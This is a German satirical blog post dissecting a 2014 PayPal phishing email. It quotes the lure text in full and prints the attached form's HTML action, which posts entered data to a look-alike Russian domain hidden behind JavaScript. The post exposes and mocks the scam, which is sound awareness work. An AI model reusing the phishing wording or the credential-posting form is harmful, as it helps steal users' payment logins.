Unser täglich Spam

Aus dem Internet frisch auf den Tisch. Köstlich und aromatisch.


Wiederherstellung Ihres PayPal-Kontos

Donnerstag, 11. Dezember 2014, 17:47 Uhr

Wie, ist es jemanden aus der Hand geglitten und kaputt gegangen, das PayPal-Konto?

Sehr geehrter PayPal-Mitglied,

Ja, das stimmt. Ich bin mit Glied.

Während unserer regelmäßigen Kontoführung und Prüfverfahren haben wir einen kleinen Fehler in Ihrer erkannt Zahlungsinformationen.

Und bei euch ist Yoda der Deutschbeauftragte. Oder besser: Euch ist deutschbeauftragt Yoda bei.

Aber wo kommt er nun her, der erschröckliche Fehler, den ihr beim Kontoführen und Prüfen erkannt habt?

Dies könnte darauf zurückzuführen sein, aus den folgenden Gründen:

1. Eine aktuelle Änderung Ihrer persönlichen Daten (zB Online-Zahlungen, E-Mail-Adresse)

Ah, er kommt daher, dass PayPal für eine Online-Zahlung benutzt wurde, oder aber daher…

2. Die Unfähigkeit, genau überprüfen Sie Ihre gewählte Option der Zahlung aufgrund eines internen Fehlers in unseren Systemen.

…dass PayPal unfähig ist. :mrgreen:

Sie müssen, um Ihre Daten wiederherzustellen. Um dies zu tun, haben wir ein angebracht zu bilden, um diese E-Mail. Bitte laden Sie das Formular aus und befolgen Sie die Anweisungen auf dem Bildschirm.

HINWEIS: Das Formular muss in einem modernen Browser, der hat geöffnet werden Javascript enabled (ex: Internet Explorer, Firefox, Safari, Opera)

Wir bitten diese Informationen zu verifizieren und schützen Sie Ihre

Identität. Dies ist, um die illegale Aktivität verhindern PayPal-Konten.

Großartige Meisterschaft der Ausdrucksfähigkeit bringt man immer noch am besten zur Geltung, indem man ihren Fluss nicht mit Anmerkungen unterbricht. :D

Bitte nicht auf diese E-Mail antworten.

Der Absender ist gefälscht.

Wir entschuldigen uns für etwaige Unannehmlichkeiten, die möglicherweise verursacht.

Ja, Phisher, ich entschuldige schon deine von dir selbst eingeräumte Unfähigkeit…

Mit freundlichen Grüßen, PayPal Security Team.

Copyright © 1999-2014 PayPal. All rights reserved.

PayPal (Europe) S.à r.l.et Cie, S.C.A.
Société en Commandite par Actions
Registered office: 22-24 Boulevard Royal, L-2449 Luxemburg
RCS Luxemburg B 118 349
PayPal Email ID PP7982

…immerhin hast du ja schon den Trick mit der Zwischenablage kapiert. Das schafft nicht jeder deiner „Kollegen“.

Und dein angehängtes HTML-Dokument, das ohne JavaScript nicht funktioniert, ist mal wieder echt göttlich:

Screenshot eines Details des angehängten HTML-Dokumentes im Editor

Schließlich kannst du dein <FORM>-Tag nicht einfach direkt reinschreiben, da stünde sonst ja drin…

<form method="post" onsubmit="return validateFormOnSubmit(this)" action="http://w.payplc.ru/de/cgi-bin/webscr.php?cmd=_logout">

…dass die eingegebenen Daten nicht etwa zur PayPal-Website gehen, sondern in die mittlerweile gewiss bei jedem Spamfilter dieser Welt bekannte Domain payplc (punkt) ru, die ganz frisch am 30. November eingerichtet wurde. Deshalb musst du diesen lächerlichen Umweg über Javascript gehen und darauf hoffen, dass die Spamfilter nicht dazu imstande sind, diese Kleinigkeit zu dechiffrieren. Du musst jetzt ganz tapfer sein, Spammer: Deine Hoffnung war vergebens.

Ach ja, und wo ich mir gerade deinen tollen HTML-Quältext anschaue: Wenn du das nächste Mal ein HTML-Dokument von PayPal in deinen Editor einfach reinkopierst, dann lösch doch bitte vorher das HTML-Gerüst, das dein Editor da reinmacht, um richtigen Webautoren die Arbeit zu erleichtern. Dieser Überrest mit einem leeren, neuen Dokument nach dem Ende des Dokumentes sieht doch ziemlich scheiße aus…

Wie, wenn du dir Mühe gäbest, könntest du auch gleich arbeiten gehen… ja, ich habs vergessen: Du bist eben ein dummer, asozialer, fauler und krimineller Spammer.

Ich mag es so sehr, da muss ich gleich mal zum Facebook klicken...

Kommentar hinterlassen

Beachten sie vor dem Schreiben eines Kommentares die Datenschutzerklärung für Unser täglich Spam. Wenn sie Wert auf ihre Privatsphäre legen und aus gutem Grund nicht überall ihren Namen und ihre E-Mail-Adresse angeben wollen, machen sie einfach Phantasieangaben.